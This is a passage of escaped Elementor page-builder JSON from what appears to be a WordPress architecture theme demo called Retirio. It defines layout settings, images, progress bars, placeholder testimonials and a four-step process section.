Nullam pretium id massa ut placerat. Class aptent taciti sociosqu ad litora.\",\"text_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_element_width\":\"auto\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":true}],\"isInner\":true},{\"id\":\"f665bb7\",\"elType\":\"widget\",\"settings\":{\"number_column\":\"four_column\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-120\",\"left\":\"0\",\"isLinked\":false},\"_animation\":\"pulse\",\"_animation_tablet\":\"none\",\"animation_duration\":\"slow\"},\"elements\":[],\"widgetType\":\"ovasev_elementor_service_box\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"015c584\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"margin\":{\"unit\":\"px\",\"top\":\"200\",\"right\":0,\"bottom\":\"110\",\"left\":0,\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"180\",\"right\":0,\"bottom\":\"70\",\"left\":0,\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"animation\":\"fadeInUp\",\"animation_tablet\":\"none\",\"animation_delay\":200},\"elements\":[{\"id\":\"f11899a\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"content_position\":\"top\",\"align\":\"center\"},\"elements\":[{\"id\":\"b5b032d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Trust the experts for all your <strong style=\\\"color: #242424;\\\">architects &amp; interior needs.<\\/strong><\\/p>\",\"text_color\":\"#9C9C9C\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"typography_font_weight\":\"600\",\"_padding\":{\"unit\":\"px\",\"top\":\"15\",\"right\":\"60\",\"bottom\":\"15\",\"left\":\"40\",\"isLinked\":false},\"_element_width\":\"auto\",\"_background_background\":\"classic\",\"_background_color\":\"#F5F5F5\",\"align_mobile\":\"center\",\"_padding_mobile\":{\"unit\":\"px\",\"top\":\"15\",\"right\":\"15\",\"bottom\":\"15\",\"left\":\"15\",\"isLinked\":false},\"text_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"6c98d6d\",\"elType\":\"widget\",\"settings\":{\"text\":\"More Service\",\"background_color\":\"#E3B25A\",\"text_padding\":{\"unit\":\"px\",\"top\":\"23\",\"right\":\"40\",\"bottom\":\"25\",\"left\":\"40\",\"isLinked\":false},\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/services\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"typography_font_weight\":\"700\",\"typography_text_transform\":\"uppercase\",\"border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_z_index\":2,\"_element_width\":\"auto\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b51484b\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"gap\":\"no\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"-15\",\"left\":0,\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"3d8a96c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"0f00906\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"our recent work\",\"title\":\"Introducing outstanding new projects\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"b4fd990\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"ova_elementor_project_filter_2\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"145a686\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"background_background\":\"classic\",\"background_color\":\"#242424\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/bg-whychoose.png\",\"id\":2116,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"center left\",\"background_repeat\":\"no-repeat\",\"background_size\":\"contain\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"gap\":\"no\",\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false}},\"elements\":[{\"id\":\"8460a70\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":45,\"padding\":{\"unit\":\"px\",\"top\":\"110\",\"right\":\"80\",\"bottom\":\"120\",\"left\":\"0\",\"isLinked\":false},\"_inline_size_tablet\":100,\"padding_tablet\":{\"unit\":\"px\",\"top\":\"90\",\"right\":\"0\",\"bottom\":\"90\",\"left\":\"0\",\"isLinked\":false},\"space_between_widgets\":15},\"elements\":[{\"id\":\"5229c85\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"our benefits\",\"title\":\"Why choose ?\",\"description\":\"There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration in some form.\\n\",\"align_heading\":\"left\",\"color_title\":\"#FFFFFF\",\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"color_sub_title\":\"#B1B1B1\",\"color_description\":\"#C2C2C2\",\"show_line_text\":\"\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"e6bce61\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"Architecture business solutions\",\"selected_icon\":{\"value\":\"ovaicon ovaicon-next-5\",\"library\":\"ovaicon\"},\"_id\":\"7113fdf\"},{\"text\":\"Top quality services with reasonable price\",\"selected_icon\":{\"value\":\"ovaicon ovaicon-next-5\",\"library\":\"ovaicon\"},\"_id\":\"e6ab069\"},{\"text\":\"Reliable & experienced architecture & designers\",\"selected_icon\":{\"value\":\"ovaicon ovaicon-next-5\",\"library\":\"ovaicon\"},\"_id\":\"5d551b6\"}],\"icon_color\":\"#E3B25A\",\"icon_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"text_color\":\"#FFFFFF\",\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"icon_typography_font_weight\":\"600\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"16\",\"left\":\"0\",\"isLinked\":false},\"icon_typography_line_height\":{\"unit\":\"em\",\"size\":0.6,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"icon-list\"},{\"id\":\"9c7a64c\",\"elType\":\"widget\",\"settings\":{\"title\":\"Archirecture\",\"percent\":{\"unit\":\"%\",\"size\":80,\"sizes\":[]},\"inner_text\":\"\",\"bar_color\":\"#E3B25A\",\"bar_bg_color\":\"#3A3A3A\",\"bar_height\":{\"unit\":\"px\",\"size\":8,\"sizes\":[]},\"title_color\":\"#FFFFFF\",\"bar_border_radius\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":19,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"progress\"},{\"id\":\"042a87b\",\"elType\":\"widget\",\"settings\":{\"title\":\"Designing\",\"percent\":{\"unit\":\"%\",\"size\":60,\"sizes\":[]},\"inner_text\":\"\",\"bar_color\":\"#E3B25A\",\"bar_bg_color\":\"#3A3A3A\",\"bar_height\":{\"unit\":\"px\",\"size\":8,\"sizes\":[]},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":19,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"progress\"}],\"isInner\":false},{\"id\":\"2ae20b7\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":55,\"background_image\":{\"url\":\"\",\"id\":\"\",\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"center center\",\"background_repeat\":\"no-repeat\",\"background_size\":\"contain\",\"css_classes\":\"retirio_stretch_column_right\",\"_inline_size_tablet\":100,\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"ca11226\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/image-why-choose.jpg\",\"id\":2090,\"alt\":\"\",\"source\":\"library\"},\"align\":\"right\",\"width_tablet\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"height\":{\"unit\":\"px\",\"size\":580,\"sizes\":[]},\"object-fit_tablet\":\"cover\",\"image_size\":\"full\",\"_transform_transition_hover\":{\"unit\":\"px\",\"size\":800,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"458230c\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#F5F5F5\",\"padding\":{\"unit\":\"px\",\"top\":\"110\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"be465bf\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"0c50faf\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"Real Testimonials\",\"title\":\"What they\\u2019re talking\\nabout retirio\",\"margin_title\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-17\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"25\",\"bottom\":\"0\",\"left\":\"25\",\"isLinked\":false},\"_padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_animation\":\"fadeInUp\",\"_animation_tablet\":\"none\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"27fa0e5\",\"elType\":\"widget\",\"settings\":{\"version\":\"version_1\",\"tab_item\":[{\"name_author\":\"Kevin martin\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"4735f8c\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/kevin-martin.jpg\",\"id\":1415,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Base.png\",\"id\":1421,\"alt\":\"\",\"source\":\"library\"},\"background_image_position\":\"initial\",\"background_image_position_tablet\":\"initial\",\"background_image_position_mobile\":\"initial\",\"background_image_xpos\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_xpos_tablet\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_image_xpos_mobile\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_ypos\":{\"unit\":\"%\",\"size\":103,\"sizes\":[]},\"background_image_ypos_tablet\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_image_repeat\":\"no-repeat\",\"background_image_repeat_mobile\":\"no-repeat\",\"background_image_size\":\"contain\",\"background_image_size_tablet\":\"cover\",\"background_image_size_mobile\":\"cover\",\"background_color_item\":\"#1B1B1B\"},{\"name_author\":\"Jessica brown \",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"71b5562\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/jessica.jpg\",\"id\":1416,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/background-line-yellow.png\",\"id\":1422,\"alt\":\"\",\"source\":\"library\"},\"background_color_item\":\"#DDAD58\"},{\"name_author\":\"Mike hardson\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"705dd08\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mike-hardson.jpg\",\"id\":1417,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Base.png\",\"id\":1421,\"alt\":\"\",\"source\":\"library\"},\"background_image_repeat\":\"no-repeat\",\"background_image_size\":\"contain\",\"background_color_item\":\"#1B1B1B\"},{\"name_author\":\"Kevin martin\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/kevin-martin.jpg\",\"id\":1415,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Base.png\",\"id\":1421,\"alt\":\"\",\"source\":\"library\"},\"background_image_position\":\"initial\",\"background_image_position_tablet\":\"initial\",\"background_image_position_mobile\":\"initial\",\"background_image_xpos\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_xpos_tablet\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_image_xpos_mobile\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_ypos\":{\"unit\":\"%\",\"size\":103,\"sizes\":[]},\"background_image_ypos_tablet\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_image_repeat\":\"no-repeat\",\"background_image_repeat_mobile\":\"no-repeat\",\"background_image_size\":\"contain\",\"background_image_size_tablet\":\"cover\",\"background_image_size_mobile\":\"cover\",\"background_color_item\":\"#1B1B1B\",\"_id\":\"8eb7d44\"},{\"name_author\":\"Mike hardson\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mike-hardson.jpg\",\"id\":1417,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Base.png\",\"id\":1421,\"alt\":\"\",\"source\":\"library\"},\"background_image_repeat\":\"no-repeat\",\"background_image_size\":\"contain\",\"background_color_item\":\"#1B1B1B\",\"_id\":\"23b7d8f\"},{\"name_author\":\"Kevin martin\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/kevin-martin.jpg\",\"id\":1415,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Base.png\",\"id\":1421,\"alt\":\"\",\"source\":\"library\"},\"background_image_position\":\"initial\",\"background_image_position_tablet\":\"initial\",\"background_image_position_mobile\":\"initial\",\"background_image_xpos\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_xpos_tablet\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_image_xpos_mobile\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_ypos\":{\"unit\":\"%\",\"size\":103,\"sizes\":[]},\"background_image_ypos_tablet\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_image_repeat\":\"no-repeat\",\"background_image_repeat_mobile\":\"no-repeat\",\"background_image_size\":\"contain\",\"background_image_size_tablet\":\"cover\",\"background_image_size_mobile\":\"cover\",\"background_color_item\":\"#1B1B1B\",\"_id\":\"6c7e338\"}],\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-280\",\"left\":\"0\",\"isLinked\":false},\"icon_quote\":{\"value\":\"flaticon flaticon-quotes\",\"library\":\"flaticon\"},\"tab_item_v2\":[{\"name_author\":\"Kevin martin\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"cf6d2b9\"},{\"name_author\":\"Jessica brown \",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"e73dd09\"},{\"name_author\":\"Mike hardson\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"127b5e7\"}],\"tab_item_v3\":[{\"name_author\":\"Kevin martin\",\"job\":\"Customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"163297c\"},{\"name_author\":\"Jessica brown \",\"job\":\"Customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"bcfaaf7\"},{\"name_author\":\"Mike hardson\",\"job\":\"Customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"80c4005\"}],\"icon_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"dot_control\":\"yes\",\"_animation\":\"bounceInUp\",\"autoplay\":\"\"},\"elements\":[],\"widgetType\":\"retirio_elementor_testimonial\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f7c9652\",\"elType\":\"section\",\"settings\":{\"padding\":{\"unit\":\"px\",\"top\":\"327\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"297\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"77dbf66\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"080887e\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"Our process\",\"title\":\"4 easy work steps\",\"_animation\":\"ova-move-down\",\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"_animation_tablet\":\"none\",\"animation_duration\":\"fast\",\"_animation_delay\":100},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"ec83ee9\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\",\"margin\":{\"unit\":\"px\",\"top\":\"50\",\"right\":0,\"bottom\":\"120\",\"left\":0,\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"50\",\"right\":0,\"bottom\":\"90\",\"left\":0,\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":0,\"bottom\":\"30\",\"left\":0,\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false}},\"elements\":[{\"id\":\"a992324\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"animation\":\"fadeInDown\",\"animation_tablet\":\"none\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/line-1.png\",\"id\":3838,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_xpos\":{\"unit\":\"px\",\"size\":60,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"padding\":{\"unit\":\"px\",\"top\":\"65\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_inline_size_tablet\":50,\"align_tablet\":\"center\",\"background_position_tablet\":\"initial\",\"background_xpos_tablet\":{\"unit\":\"px\",\"size\":150,\"sizes\":[]},\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"content_position_tablet\":\"top\",\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"background_ypos\":{\"unit\":\"px\",\"size\":-1,\"sizes\":[]}},\"elements\":[{\"id\":\"fd3636d\",\"elType\":\"widget\",\"settings\":{\"text\":\"Design\\nconcept \\n\",\"numerical_order\":\"01\",\"top_order\":{\"unit\":\"px\",\"size\":-24,\"sizes\":[]},\"right_order\":{\"unit\":\"px\",\"size\":-80,\"sizes\":[]},\"_element_width_mobile\":\"auto\",\"bottom_mobile\":{\"unit\":\"px\",\"size\":175,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_ova_icon_box_2\"}],\"isInner\":true},{\"id\":\"b9984a7\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"animation\":\"fadeInDown\",\"animation_tablet\":\"none\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/line-2.png\",\"id\":3839,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_xpos\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_xpos_tablet\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"background_ypos\":{\"unit\":\"px\",\"size\":135,\"sizes\":[]},\"background_ypos_tablet\":{\"unit\":\"px\",\"size\":140,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"padding\":{\"unit\":\"px\",\"top\":\"55\",\"right\":\"0\",\"bottom\":\"65\",\"left\":\"0\",\"isLinked\":false},\"_inline_size_tablet\":50,\"align_tablet\":\"center\",\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"content_position_tablet\":\"bottom\",\"background_position_tablet\":\"initial\",\"margin_mobile\":{\"unit\":\"px\",\"top\":\"120\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"animation_delay\":250},\"elements\":[{\"id\":\"aba257a\",\"elType\":\"widget\",\"settings\":{\"icon\":{\"value\":\"flaticon flaticon-interior-design\",\"library\":\"flaticon\"},\"text\":\"Design\\nschematic \\n\",\"numerical_order\":\"02\",\"text_position\":\"top-left\",\"_element_width_mobile\":\"auto\"},\"elements\":[],\"widgetType\":\"retirio_elementor_ova_icon_box_2\"}],\"isInner\":true},{\"id\":\"24d2339\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"animation\":\"fadeInDown\",\"animation_tablet\":\"none\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/line-1.png\",\"id\":3838,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_xpos\":{\"unit\":\"px\",\"size\":57,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"padding\":{\"unit\":\"px\",\"top\":\"65\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_inline_size_tablet\":50,\"align_tablet\":\"center\",\"background_position_tablet\":\"initial\",\"background_xpos_tablet\":{\"unit\":\"px\",\"size\":60,\"sizes\":[]},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"content_position_tablet\":\"top\",\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"animation_delay\":500},\"elements\":[{\"id\":\"0f2ef7d\",\"elType\":\"widget\",\"settings\":{\"icon\":{\"value\":\"flaticon flaticon-development\",\"library\":\"flaticon\"},\"text\":\"Design\\ndevelopment\",\"numerical_order\":\"03\",\"top_order\":{\"unit\":\"px\",\"size\":-27,\"sizes\":[]},\"_element_width_mobile\":\"auto\",\"bottom_mobile\":{\"unit\":\"px\",\"size\":175,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_ova_icon_box_2\"}],\"isInner\":true},{\"id\":\"d6ce61d\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"animation\":\"fadeInDown\",\"animation_tablet\":\"none\",\"_inline_size_tablet\":50,\"content_position_tablet\":\"bottom\",\"align_tablet\":\"center\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/line-2.png\",\"id\":3839,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_position_tablet\":\"initial\",\"background_xpos\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_xpos_tablet\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":-100,\"sizes\":[]},\"background_ypos\":{\"unit\":\"px\",\"size\":135,\"sizes\":[]},\"background_ypos_tablet\":{\"unit\":\"px\",\"size\":140,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":-100,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"padding\":{\"unit\":\"px\",\"top\":\"55\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"animation_delay\":750},\"elements\":[{\"id\":\"020e37a\",\"elType\":\"widget\",\"settings\":{\"icon\":{\"value\":\"flaticon 